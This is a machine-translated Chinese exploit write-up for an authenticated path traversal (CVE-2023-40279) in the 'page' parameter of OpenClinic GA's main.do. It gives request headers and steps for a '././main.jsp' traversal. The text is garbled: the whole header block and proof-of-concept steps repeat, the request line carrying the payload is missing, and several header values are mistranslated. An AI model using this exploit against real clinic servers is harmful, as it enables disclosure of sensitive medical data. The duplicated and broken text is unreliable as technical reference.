#利用标题: OpenClinic GA 5.247.01-路径遍历(认证)
#日期: 2023-08-14
#利用作者: V. B.
#供应商HomePage3360 https://sourceforge.net/projects/open-clinic/
#软件link: https://sourceforge.net/projects/open-clinic/
#版本: Openclinic GA 5.247.01
#测试在: Windows 10,Windows 11
#CVE: CVE-2023-40279
# 细节
在OpenClinic GA版本5.247.01中发现了一个问题,攻击者可以通过“ get request”到“ main.do”中的“页面”参数执行目录路径遍历。此漏洞允许从任意目录中检索和执行文件。
#概念证明(POC)
复制步骤:
HOST: 192.168.100.5:10088
Accept-incoding: Gzip,放气
ACCEPT: /
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/103.0.5060.134 Safari/537.36
连接:关闭
cookie: jsessionid=[会话ID]
cache-control: max-age=0
2。确认漏洞:
#日期: 2023-08-14
#利用作者: V. B.
#供应商HomePage3360 https://sourceforge.net/projects/open-clinic/
#软件link: https://sourceforge.net/projects/open-clinic/
#版本: Openclinic GA 5.247.01
#测试在: Windows 10,Windows 11
#CVE: CVE-2023-40279
# 细节
在OpenClinic GA版本5.247.01中发现了一个问题,攻击者可以通过“ get request”到“ main.do”中的“页面”参数执行目录路径遍历。此漏洞允许从任意目录中检索和执行文件。
#概念证明(POC)
复制步骤:
- 制作恶意获取请求:
- 使用网络浏览器或能够发送自定义HTTP请求的工具,例如Curl或Burp Suite。
- 格式为get请求如下(在此示例中,
././main.jsp
用于尝试目录遍历以访问main.jsp
):
HOST: 192.168.100.5:10088
Accept-incoding: Gzip,放气
ACCEPT: /
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/103.0.5060.134 Safari/537.36
连接:关闭
cookie: jsessionid=[会话ID]
cache-control: max-age=0
2。确认漏洞:
- 将精心设计的GET请求发送到目标服务器。
- 如果服务器使用所请求的文件的内容(例如,
main.jsp
)从预期目录外部响应,则确认目录路径遍布漏洞的存在。 - 这种脆弱性会导致敏感信息披露或更严重的攻击。